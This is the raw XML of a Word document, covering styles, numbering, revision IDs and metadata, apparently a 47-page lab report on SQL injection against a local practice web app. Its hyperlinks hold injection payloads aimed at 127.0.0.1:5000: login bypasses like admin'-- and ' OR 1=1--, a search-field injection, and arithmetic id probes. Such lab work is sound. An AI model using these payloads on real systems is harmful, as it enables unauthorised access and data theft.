  <w:num w:numId="48" w16cid:durableId="280494927">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1973632204">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="760764276">
    <w:abstractNumId w:val="94"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1011834937">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="51001714">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1706755686">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="337849081">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="833030892">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1500922629">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1595238914">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="421033197">
    <w:abstractNumId w:val="105"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="365374117">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1074743813">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1424449830">
    <w:abstractNumId w:val="109"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1474759185">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1213691114">
    <w:abstractNumId w:val="108"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="446122163">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1120995700">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="164512529">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="590235425">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="1503161021">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="1737436082">
    <w:abstractNumId w:val="104"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="903415772">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="837579567">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1105156317">
    <w:abstractNumId w:val="89"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="184908137">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="822624670">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="2104689342">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="532577936">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="198132168">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="1857960061">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="1874341402">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="1282617072">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="483084334">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="64301704">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="1461147897">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="84" w16cid:durableId="571626717">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="85" w16cid:durableId="618875343">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="86" w16cid:durableId="311756715">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="87" w16cid:durableId="300113204">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="88" w16cid:durableId="176776307">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="89" w16cid:durableId="2020113638">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="90" w16cid:durableId="295111628">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="91" w16cid:durableId="528950329">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="92" w16cid:durableId="1397779751">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="93" w16cid:durableId="1081297436">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="94" w16cid:durableId="342057320">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="95" w16cid:durableId="2081906759">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="96" w16cid:durableId="485123019">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="97" w16cid:durableId="560168932">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="98" w16cid:durableId="642807087">
    <w:abstractNumId w:val="88"/>
  </w:num>
  <w:num w:numId="99" w16cid:durableId="1306161545">
    <w:abstractNumId w:val="85"/>
  </w:num>
  <w:num w:numId="100" w16cid:durableId="1519463676">
    <w:abstractNumId w:val="102"/>
  </w:num>
  <w:num w:numId="101" w16cid:durableId="1462335164">
    <w:abstractNumId w:val="95"/>
  </w:num>
  <w:num w:numId="102" w16cid:durableId="1598369072">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="103" w16cid:durableId="1723601393">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="104" w16cid:durableId="394200962">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="105" w16cid:durableId="2114083188">
    <w:abstractNumId w:val="98"/>
  </w:num>
  <w:num w:numId="106" w16cid:durableId="465589228">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="107" w16cid:durableId="2040935569">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="108" w16cid:durableId="1909611935">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="109" w16cid:durableId="1133716384">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="110" w16cid:durableId="12769068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A80"/>
    <w:rsid w:val="00001296"/>
    <w:rsid w:val="0001091A"/>
    <w:rsid w:val="00017AF9"/>
    <w:rsid w:val="00042052"/>
    <w:rsid w:val="00045E30"/>
    <w:rsid w:val="000468A5"/>
    <w:rsid w:val="00051263"/>
    <w:rsid w:val="000541E2"/>
    <w:rsid w:val="0008176C"/>
    <w:rsid w:val="000837E1"/>
    <w:rsid w:val="00083F42"/>
    <w:rsid w:val="00087E1E"/>
    <w:rsid w:val="00094BF9"/>
    <w:rsid w:val="00096962"/>
    <w:rsid w:val="000B1A67"/>
    <w:rsid w:val="000B58E7"/>
    <w:rsid w:val="000C0959"/>
    <w:rsid w:val="000C2644"/>
    <w:rsid w:val="000D1FE3"/>
    <w:rsid w:val="000D38F0"/>
    <w:rsid w:val="0011732C"/>
    <w:rsid w:val="0014142C"/>
    <w:rsid w:val="00155571"/>
    <w:rsid w:val="00160A4B"/>
    <w:rsid w:val="00181880"/>
    <w:rsid w:val="0018773F"/>
    <w:rsid w:val="001911DA"/>
    <w:rsid w:val="00191A77"/>
    <w:rsid w:val="001B3D56"/>
    <w:rsid w:val="001B5446"/>
    <w:rsid w:val="001D171A"/>
    <w:rsid w:val="001E48B4"/>
    <w:rsid w:val="001F0723"/>
    <w:rsid w:val="00200D2D"/>
    <w:rsid w:val="0020332C"/>
    <w:rsid w:val="0020783A"/>
    <w:rsid w:val="002100C9"/>
    <w:rsid w:val="00217563"/>
    <w:rsid w:val="002244BA"/>
    <w:rsid w:val="00226FE1"/>
    <w:rsid w:val="002348BB"/>
    <w:rsid w:val="00244847"/>
    <w:rsid w:val="002555B7"/>
    <w:rsid w:val="0025682D"/>
    <w:rsid w:val="00264061"/>
    <w:rsid w:val="002648B4"/>
    <w:rsid w:val="0027243D"/>
    <w:rsid w:val="00282C40"/>
    <w:rsid w:val="00283515"/>
    <w:rsid w:val="00291358"/>
    <w:rsid w:val="002A7909"/>
    <w:rsid w:val="002B0F18"/>
    <w:rsid w:val="002B4583"/>
    <w:rsid w:val="002B791E"/>
    <w:rsid w:val="002D08EA"/>
    <w:rsid w:val="002F3731"/>
    <w:rsid w:val="0030697D"/>
    <w:rsid w:val="0031744E"/>
    <w:rsid w:val="00323FEC"/>
    <w:rsid w:val="00341B58"/>
    <w:rsid w:val="00343EDB"/>
    <w:rsid w:val="00347BF6"/>
    <w:rsid w:val="003539FA"/>
    <w:rsid w:val="00357A80"/>
    <w:rsid w:val="00364D41"/>
    <w:rsid w:val="00367FF7"/>
    <w:rsid w:val="003741AA"/>
    <w:rsid w:val="003770C2"/>
    <w:rsid w:val="00377D7B"/>
    <w:rsid w:val="00387690"/>
    <w:rsid w:val="00392B91"/>
    <w:rsid w:val="00392E85"/>
    <w:rsid w:val="003B251C"/>
    <w:rsid w:val="003B5888"/>
    <w:rsid w:val="003B7CEA"/>
    <w:rsid w:val="003B7CFB"/>
    <w:rsid w:val="003C01E1"/>
    <w:rsid w:val="003C6FC8"/>
    <w:rsid w:val="003D2AED"/>
    <w:rsid w:val="003F554B"/>
    <w:rsid w:val="003F702D"/>
    <w:rsid w:val="0040374E"/>
    <w:rsid w:val="004075BB"/>
    <w:rsid w:val="004131A1"/>
    <w:rsid w:val="0041586F"/>
    <w:rsid w:val="00420570"/>
    <w:rsid w:val="00421CBC"/>
    <w:rsid w:val="00425F54"/>
    <w:rsid w:val="00426481"/>
    <w:rsid w:val="00431044"/>
    <w:rsid w:val="00443054"/>
    <w:rsid w:val="00446697"/>
    <w:rsid w:val="00450054"/>
    <w:rsid w:val="004526F8"/>
    <w:rsid w:val="004547A4"/>
    <w:rsid w:val="004564AE"/>
    <w:rsid w:val="00457262"/>
    <w:rsid w:val="00462E09"/>
    <w:rsid w:val="004730C8"/>
    <w:rsid w:val="00477367"/>
    <w:rsid w:val="004B4F41"/>
    <w:rsid w:val="004C5D28"/>
    <w:rsid w:val="004C76DF"/>
    <w:rsid w:val="004F0650"/>
    <w:rsid w:val="004F20ED"/>
    <w:rsid w:val="004F2BE0"/>
    <w:rsid w:val="0051092F"/>
    <w:rsid w:val="00515E15"/>
    <w:rsid w:val="00533F6B"/>
    <w:rsid w:val="00536EAB"/>
    <w:rsid w:val="0053718A"/>
    <w:rsid w:val="00541290"/>
    <w:rsid w:val="0056447F"/>
    <w:rsid w:val="0057332B"/>
    <w:rsid w:val="00573363"/>
    <w:rsid w:val="0058682F"/>
    <w:rsid w:val="00595622"/>
    <w:rsid w:val="005975D3"/>
    <w:rsid w:val="005B129A"/>
    <w:rsid w:val="005B153E"/>
    <w:rsid w:val="005C0450"/>
    <w:rsid w:val="005C5603"/>
    <w:rsid w:val="005C606A"/>
    <w:rsid w:val="005D6385"/>
    <w:rsid w:val="005E6D9D"/>
    <w:rsid w:val="005F6D0E"/>
    <w:rsid w:val="0060565B"/>
    <w:rsid w:val="0062082A"/>
    <w:rsid w:val="00636709"/>
    <w:rsid w:val="00636D33"/>
    <w:rsid w:val="00641DAA"/>
    <w:rsid w:val="006420C1"/>
    <w:rsid w:val="00643636"/>
    <w:rsid w:val="00647F74"/>
    <w:rsid w:val="00651991"/>
    <w:rsid w:val="00653C05"/>
    <w:rsid w:val="006573A5"/>
    <w:rsid w:val="00676AC8"/>
    <w:rsid w:val="006774F7"/>
    <w:rsid w:val="006909D2"/>
    <w:rsid w:val="006A6D8D"/>
    <w:rsid w:val="006B43F6"/>
    <w:rsid w:val="006B6F9B"/>
    <w:rsid w:val="006C6239"/>
    <w:rsid w:val="006D464F"/>
    <w:rsid w:val="006D7442"/>
    <w:rsid w:val="006F02C7"/>
    <w:rsid w:val="006F1661"/>
    <w:rsid w:val="006F72A2"/>
    <w:rsid w:val="007306CA"/>
    <w:rsid w:val="00762066"/>
    <w:rsid w:val="00762666"/>
    <w:rsid w:val="00767AEB"/>
    <w:rsid w:val="00767AED"/>
    <w:rsid w:val="0077706A"/>
    <w:rsid w:val="00780F3E"/>
    <w:rsid w:val="00792857"/>
    <w:rsid w:val="007967DB"/>
    <w:rsid w:val="007A2A39"/>
    <w:rsid w:val="007A2D4C"/>
    <w:rsid w:val="007A702A"/>
    <w:rsid w:val="007B4F52"/>
    <w:rsid w:val="007C38D0"/>
    <w:rsid w:val="007D1537"/>
    <w:rsid w:val="007D5602"/>
    <w:rsid w:val="007D77E3"/>
    <w:rsid w:val="007E1A8B"/>
    <w:rsid w:val="007E4D50"/>
    <w:rsid w:val="007F3D29"/>
    <w:rsid w:val="00804F64"/>
    <w:rsid w:val="00811E6D"/>
    <w:rsid w:val="00836491"/>
    <w:rsid w:val="00842AEE"/>
    <w:rsid w:val="00846C8A"/>
    <w:rsid w:val="00856F2E"/>
    <w:rsid w:val="008762D3"/>
    <w:rsid w:val="00882750"/>
    <w:rsid w:val="0088278C"/>
    <w:rsid w:val="00897098"/>
    <w:rsid w:val="008A027C"/>
    <w:rsid w:val="008A0615"/>
    <w:rsid w:val="008A22B8"/>
    <w:rsid w:val="008A2A1E"/>
    <w:rsid w:val="008B23C7"/>
    <w:rsid w:val="008D27B5"/>
    <w:rsid w:val="008D407D"/>
    <w:rsid w:val="008E42A1"/>
    <w:rsid w:val="008E5C1C"/>
    <w:rsid w:val="00900509"/>
    <w:rsid w:val="00903253"/>
    <w:rsid w:val="00917FD1"/>
    <w:rsid w:val="009205C6"/>
    <w:rsid w:val="00934C01"/>
    <w:rsid w:val="0093575B"/>
    <w:rsid w:val="00937EF7"/>
    <w:rsid w:val="00940B80"/>
    <w:rsid w:val="0094343C"/>
    <w:rsid w:val="00943CF9"/>
    <w:rsid w:val="0096183E"/>
    <w:rsid w:val="0096382E"/>
    <w:rsid w:val="009740E5"/>
    <w:rsid w:val="00975AFC"/>
    <w:rsid w:val="00980698"/>
    <w:rsid w:val="00980942"/>
    <w:rsid w:val="009936F8"/>
    <w:rsid w:val="009967A7"/>
    <w:rsid w:val="00997632"/>
    <w:rsid w:val="009A7004"/>
    <w:rsid w:val="009B1989"/>
    <w:rsid w:val="009B7918"/>
    <w:rsid w:val="009C4F3F"/>
    <w:rsid w:val="009D10F7"/>
    <w:rsid w:val="009E0A52"/>
    <w:rsid w:val="009E1A0C"/>
    <w:rsid w:val="009F2125"/>
    <w:rsid w:val="009F4573"/>
    <w:rsid w:val="00A00A53"/>
    <w:rsid w:val="00A0624E"/>
    <w:rsid w:val="00A155EC"/>
    <w:rsid w:val="00A17F45"/>
    <w:rsid w:val="00A24579"/>
    <w:rsid w:val="00A403EF"/>
    <w:rsid w:val="00A50496"/>
    <w:rsid w:val="00A51870"/>
    <w:rsid w:val="00A518D4"/>
    <w:rsid w:val="00A5572D"/>
    <w:rsid w:val="00A57E1D"/>
    <w:rsid w:val="00A62391"/>
    <w:rsid w:val="00A63935"/>
    <w:rsid w:val="00A64062"/>
    <w:rsid w:val="00A65CA2"/>
    <w:rsid w:val="00A71336"/>
    <w:rsid w:val="00A7780F"/>
    <w:rsid w:val="00A8564B"/>
    <w:rsid w:val="00AB40EA"/>
    <w:rsid w:val="00AD58C9"/>
    <w:rsid w:val="00AD78BA"/>
    <w:rsid w:val="00AE3582"/>
    <w:rsid w:val="00AF3AC1"/>
    <w:rsid w:val="00B04341"/>
    <w:rsid w:val="00B07D6D"/>
    <w:rsid w:val="00B10E66"/>
    <w:rsid w:val="00B30E85"/>
    <w:rsid w:val="00B33AF8"/>
    <w:rsid w:val="00B5077A"/>
    <w:rsid w:val="00B53E69"/>
    <w:rsid w:val="00B53E75"/>
    <w:rsid w:val="00B61C98"/>
    <w:rsid w:val="00B659E3"/>
    <w:rsid w:val="00B65A29"/>
    <w:rsid w:val="00B722AD"/>
    <w:rsid w:val="00B74756"/>
    <w:rsid w:val="00B86C3D"/>
    <w:rsid w:val="00B94229"/>
    <w:rsid w:val="00B95825"/>
    <w:rsid w:val="00BB5869"/>
    <w:rsid w:val="00BB5D74"/>
    <w:rsid w:val="00BC0D61"/>
    <w:rsid w:val="00BC55FD"/>
    <w:rsid w:val="00BC5EE9"/>
    <w:rsid w:val="00BC77AB"/>
    <w:rsid w:val="00BD2884"/>
    <w:rsid w:val="00BD6969"/>
    <w:rsid w:val="00BE0F6D"/>
    <w:rsid w:val="00BE5467"/>
    <w:rsid w:val="00C01414"/>
    <w:rsid w:val="00C05B1B"/>
    <w:rsid w:val="00C061B7"/>
    <w:rsid w:val="00C15B6B"/>
    <w:rsid w:val="00C16E4C"/>
    <w:rsid w:val="00C420C1"/>
    <w:rsid w:val="00C426B0"/>
    <w:rsid w:val="00C56426"/>
    <w:rsid w:val="00C62216"/>
    <w:rsid w:val="00C648A0"/>
    <w:rsid w:val="00C803EF"/>
    <w:rsid w:val="00C91A87"/>
    <w:rsid w:val="00C92F89"/>
    <w:rsid w:val="00C93754"/>
    <w:rsid w:val="00C96DED"/>
    <w:rsid w:val="00C977EF"/>
    <w:rsid w:val="00CA3243"/>
    <w:rsid w:val="00CA57A2"/>
    <w:rsid w:val="00CB36A8"/>
    <w:rsid w:val="00CC32EF"/>
    <w:rsid w:val="00CD2150"/>
    <w:rsid w:val="00CD75B9"/>
    <w:rsid w:val="00CE1763"/>
    <w:rsid w:val="00CE3D6B"/>
    <w:rsid w:val="00CE637A"/>
    <w:rsid w:val="00CF4960"/>
    <w:rsid w:val="00CF599B"/>
    <w:rsid w:val="00CF5FE8"/>
    <w:rsid w:val="00CF77B4"/>
    <w:rsid w:val="00D016D2"/>
    <w:rsid w:val="00D2570F"/>
    <w:rsid w:val="00D2593E"/>
    <w:rsid w:val="00D273E9"/>
    <w:rsid w:val="00D42239"/>
    <w:rsid w:val="00D43568"/>
    <w:rsid w:val="00D542D6"/>
    <w:rsid w:val="00D6012F"/>
    <w:rsid w:val="00D839F5"/>
    <w:rsid w:val="00DA0035"/>
    <w:rsid w:val="00DA7BB8"/>
    <w:rsid w:val="00DB397A"/>
    <w:rsid w:val="00DC28F0"/>
    <w:rsid w:val="00DC2DEA"/>
    <w:rsid w:val="00DC379B"/>
    <w:rsid w:val="00DC794D"/>
    <w:rsid w:val="00DE7720"/>
    <w:rsid w:val="00DF3CC4"/>
    <w:rsid w:val="00DF4108"/>
    <w:rsid w:val="00E000BF"/>
    <w:rsid w:val="00E03E7C"/>
    <w:rsid w:val="00E066A4"/>
    <w:rsid w:val="00E16F90"/>
    <w:rsid w:val="00E1734C"/>
    <w:rsid w:val="00E213F8"/>
    <w:rsid w:val="00E238FE"/>
    <w:rsid w:val="00E27102"/>
    <w:rsid w:val="00E33E3F"/>
    <w:rsid w:val="00E33EB4"/>
    <w:rsid w:val="00E37047"/>
    <w:rsid w:val="00E444D2"/>
    <w:rsid w:val="00E522F6"/>
    <w:rsid w:val="00E73799"/>
    <w:rsid w:val="00E97321"/>
    <w:rsid w:val="00EC09FC"/>
    <w:rsid w:val="00EC7813"/>
    <w:rsid w:val="00ED23DC"/>
    <w:rsid w:val="00ED612D"/>
    <w:rsid w:val="00ED68CB"/>
    <w:rsid w:val="00EE2082"/>
    <w:rsid w:val="00EF5EE7"/>
    <w:rsid w:val="00F07980"/>
    <w:rsid w:val="00F14725"/>
    <w:rsid w:val="00F17628"/>
    <w:rsid w:val="00F210FF"/>
    <w:rsid w:val="00F304EB"/>
    <w:rsid w:val="00F35744"/>
    <w:rsid w:val="00F42B77"/>
    <w:rsid w:val="00F45F8D"/>
    <w:rsid w:val="00F53F6B"/>
    <w:rsid w:val="00F54934"/>
    <w:rsid w:val="00F558BB"/>
    <w:rsid w:val="00F6016E"/>
    <w:rsid w:val="00F7274B"/>
    <w:rsid w:val="00F81764"/>
    <w:rsid w:val="00F831A9"/>
    <w:rsid w:val="00FA0D59"/>
    <w:rsid w:val="00FA40B5"/>
    <w:rsid w:val="00FA62E2"/>
    <w:rsid w:val="00FA76D2"/>
    <w:rsid w:val="00FC1B1E"/>
    <w:rsid w:val="00FC1F9D"/>
    <w:rsid w:val="00FE0161"/>
    <w:rsid w:val="00FE2030"/>
    <w:rsid w:val="00FE48C3"/>
    <w:rsid w:val="00FE6C8A"/>
    <w:rsid w:val="00FE7B25"/>
    <w:rsid w:val="00FF0E3B"/>
    <w:rsid w:val="00FF10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EE978"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C37D8C61-43A2-4BD2-AF51-0EBE45BFF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004"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00357A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57A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57A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7A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7A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7A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7A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7A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7A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A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5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57A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7A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7A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7A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7A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7A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7A80"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00357A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7A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7A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7A80"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00357A80"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00357A80"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00357A80"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00357A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7A80"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00357A80"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006B6F9B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006B6F9B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE358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127.0.0.1:5000/search?publisher=%27%27" TargetMode="External"/><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hyperlink" Target="http://127.0.0.1:5000/login?username=admin'--&amp;password=anything" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/login?username=%27%20OR%201=1--&amp;password=x"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127.0.0.1:5000/page?id=1" TargetMode="External"/><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png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/search?publisher=Wiley%27%20OR%201=1--" TargetMode="External"/><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7.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/login?username=admin&amp;password=admin123"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hyperlink" Target="http://127.0.0.1:5000/page?id=1+1"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127.0.0.1:5000/search?publisher=%27"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127.0.0.1:5000/login?username=admin%27--&amp;password=anything" TargetMode="External"/><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hyperlink" Target="http://127.0.0.1:5000/search?publisher=Wiley"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9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/page?id=67-65" TargetMode="External"/><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5.png"/><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hyperlink" Target="http://127.0.0.1:5000/login?username=admin&amp;password=admin1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613</TotalTime>
  <Pages>47</Pages>
  <Words>3874</Words>
  <Characters>22083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359</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-30T14:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-08T14:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>